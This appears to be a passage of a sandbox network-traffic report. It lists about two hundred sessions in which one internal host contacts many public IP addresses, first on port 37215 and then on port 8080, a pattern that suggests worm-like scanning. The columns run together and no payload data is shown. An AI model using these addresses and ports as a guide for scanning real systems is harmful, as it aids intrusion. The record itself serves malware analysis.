                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9846192.168.2.2345910185.12.255.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9847192.168.2.2358962130.131.32.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9848192.168.2.234330441.29.201.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9849192.168.2.2343392157.168.207.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9850192.168.2.2345592157.223.6.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9851192.168.2.2353640216.143.198.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9852192.168.2.235325041.206.24.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9853192.168.2.2336554157.198.6.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9854192.168.2.2355440120.194.124.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9855192.168.2.2350546157.36.71.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9856192.168.2.233880641.234.161.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9857192.168.2.2342906197.205.4.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9858192.168.2.235044484.121.171.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9859192.168.2.234148619.16.3.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9860192.168.2.2334696197.180.141.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9861192.168.2.2356124157.238.219.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9862192.168.2.2349020157.123.158.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9863192.168.2.2337192197.75.250.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9864192.168.2.2350844157.187.205.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9865192.168.2.2351152180.25.123.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9866192.168.2.235049841.254.60.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9867192.168.2.2342484157.163.159.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9868192.168.2.2337148157.250.73.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9869192.168.2.2350208211.191.143.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9870192.168.2.2340634197.158.134.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9871192.168.2.235667650.28.247.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9872192.168.2.234138871.172.109.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9873192.168.2.2340144197.173.131.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9874192.168.2.235160041.170.150.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9875192.168.2.2344180157.6.6.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9876192.168.2.2337554174.165.33.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9877192.168.2.234559241.89.147.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9878192.168.2.2333194157.212.182.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9879192.168.2.233515241.155.197.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9880192.168.2.2336814197.30.219.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9881192.168.2.2352532197.121.225.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9882192.168.2.2360888197.13.1.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9883192.168.2.234351441.99.183.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9884192.168.2.2350284197.255.220.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9885192.168.2.235231841.201.1.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9886192.168.2.2348072162.29.67.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9887192.168.2.234166241.22.48.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9888192.168.2.234934641.194.23.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9889192.168.2.2360078197.68.238.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9890192.168.2.233823241.204.88.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9891192.168.2.2360862197.84.121.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9892192.168.2.233795041.141.137.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9893192.168.2.235772618.104.7.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9894192.168.2.2351244157.147.187.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9895192.168.2.235653841.125.173.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9896192.168.2.2336764157.229.203.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9897192.168.2.235230041.195.142.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9898192.168.2.234680441.196.54.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9899192.168.2.234184041.129.39.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9900192.168.2.2359786142.62.242.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9901192.168.2.2350858157.18.224.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9902192.168.2.2342234157.22.69.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9903192.168.2.2342350157.57.162.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9904192.168.2.2358846157.79.202.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9905192.168.2.2333928197.130.37.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9906192.168.2.235948841.12.246.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9907192.168.2.2344444197.53.41.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9908192.168.2.234758841.97.43.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9909192.168.2.2351644157.175.64.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9910192.168.2.2342078156.233.45.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9911192.168.2.2345102157.241.52.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9912192.168.2.2334604210.243.122.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9913192.168.2.2338294174.105.66.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9914192.168.2.2350592155.175.128.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9915192.168.2.2334242186.67.204.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9916192.168.2.234428266.50.241.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9917192.168.2.2341774109.220.145.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9918192.168.2.2353410116.92.146.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9919192.168.2.234423296.142.13.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9920192.168.2.235754457.209.203.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9921192.168.2.2345556103.190.139.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9922192.168.2.2358240160.215.96.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9923192.168.2.2353996192.138.93.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9924192.168.2.233842059.1.108.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9925192.168.2.2338934222.253.246.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9926192.168.2.2351718186.77.212.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9927192.168.2.2333128182.109.87.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9928192.168.2.2338050117.5.231.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9929192.168.2.235899458.206.129.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9930192.168.2.233317869.251.142.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9931192.168.2.235383838.92.187.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9932192.168.2.2336500105.3.120.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9933192.168.2.235558676.188.189.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9934192.168.2.2358424103.6.56.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9935192.168.2.234585479.130.82.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9936192.168.2.234156459.104.50.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9937192.168.2.2333010136.178.189.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9938192.168.2.235114213.209.118.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9939192.168.2.2333194125.71.120.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9940192.168.2.2342382179.199.151.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9941192.168.2.2345888147.53.187.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9942192.168.2.2346336147.48.199.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9943192.168.2.235882283.27.231.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9944192.168.2.2347460217.1.64.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9945192.168.2.2350562137.18.191.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9946192.168.2.2335866185.241.68.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9947192.168.2.2335018217.136.156.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9948192.168.2.2340058179.3.217.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9949192.168.2.234693270.92.66.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9950192.168.2.2353036189.244.58.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9951192.168.2.235429257.70.6.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9952192.168.2.2337286185.232.28.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9953192.168.2.2359792122.118.170.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9954192.168.2.233580461.237.83.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9955192.168.2.234621082.57.156.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9956192.168.2.2340242178.42.164.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9957192.168.2.2352104125.203.143.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9958192.168.2.236042843.183.107.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9959192.168.2.2353538104.171.179.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9960192.168.2.2352672155.142.123.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9961192.168.2.234256844.115.177.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9962192.168.2.234856447.90.71.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9963192.168.2.2352418113.19.65.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9964192.168.2.235828054.141.156.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9965192.168.2.2338384110.42.90.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9966192.168.2.2354640151.251.140.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9967192.168.2.2339020160.7.254.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9968192.168.2.233632873.197.206.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9969192.168.2.2358938217.79.22.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9970192.168.2.2336704167.226.176.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9971192.168.2.235829458.137.220.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9972192.168.2.233369853.160.202.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9973192.168.2.2339656192.55.54.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9974192.168.2.235270031.217.118.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9975192.168.2.2342438122.255.70.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9976192.168.2.235668268.167.85.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9977192.168.2.2334874210.59.194.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9978192.168.2.2358226129.168.124.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9979192.168.2.2341424140.7.76.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9980192.168.2.2342838155.145.224.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9981192.168.2.23515561.118.49.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9982192.168.2.234875812.25.240.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9983192.168.2.2340956130.112.132.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9984192.168.2.233418839.225.70.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9985192.168.2.2340452191.145.182.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9986192.168.2.233789479.104.255.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9987192.168.2.2344580210.83.127.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9988192.168.2.2345328211.183.79.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9989192.168.2.2335090193.221.34.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9990192.168.2.2333376193.10.152.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9991192.168.2.2342788152.103.78.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9992192.168.2.235987274.110.100.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9993192.168.2.2354592179.10.248.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9994192.168.2.2334094169.219.235.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9995192.168.2.2335862101.205.44.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9996192.168.2.2336554126.51.62.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9997192.168.2.235819640.47.20.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9998192.168.2.234912090.204.61.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9999192.168.2.2339374148.153.134.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10000192.168.2.235459020.169.152.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10001192.168.2.234401639.18.55.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10002192.168.2.2346064187.156.226.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10003192.168.2.2347620139.156.35.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10004192.168.2.2339546167.126.117.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10005192.168.2.235941651.220.136.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10006192.168.2.233287857.67.88.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10007192.168.2.2348882182.121.224.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10008192.168.2.2346692220.160.215.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10009192.168.2.2360202222.69.26.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10010192.168.2.2341288157.145.252.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10011192.168.2.2345746201.142.229.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10012192.168.2.2346992201.119.185.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10013192.168.2.234534092.216.13.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10014192.168.2.2355412155.134.42.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10015192.168.2.2349620204.21.38.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10016192.168.2.235155495.51.17.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10017192.168.2.234219251.201.142.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10018192.168.2.2337466118.174.221.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10019192.168.2.234258247.182.207.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10020192.168.2.2335046112.232.170.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10021192.168.2.2346330191.46.88.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10022192.168.2.235789648.2.208.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10023192.168.2.235123218.41.167.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10024192.168.2.2343484223.68.156.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10025192.168.2.2345762130.234.154.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10026192.168.2.235446043.199.79.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10027192.168.2.234131881.230.64.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10028192.168.2.235793234.149.254.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10029192.168.2.235395268.128.36.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10030192.168.2.2357908143.105.45.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10031192.168.2.233918260.104.64.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10032192.168.2.2340274212.255.198.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10033192.168.2.2353846165.57.188.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10034192.168.2.2338456144.162.103.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10035192.168.2.2341142222.134.206.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10036192.168.2.2347306111.178.45.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10037192.168.2.235221499.0.126.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10038192.168.2.2339596143.122.109.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10039192.168.2.2357374210.189.42.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10040192.168.2.2360622114.146.186.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10041192.168.2.2348526162.196.21.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10042192.168.2.234858477.190.243.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10043192.168.2.2349892129.6.73.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10044192.168.2.2351552209.166.86.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10045192.168.2.2345840187.101.194.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10046192.168.2.234930672.26.214.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10047192.168.2.2339078169.77.135.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10048192.168.2.2339922208.141.127.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10049192.168.2.235153442.226.188.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10050192.168.2.235118482.120.42.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10051192.168.2.2350062202.255.199.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10052192.168.2.2333012146.97.232.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10053192.168.2.235544458.34.36.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10054192.168.2.23358889.42.38.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10055192.168.2.2350692164.62.202.98080
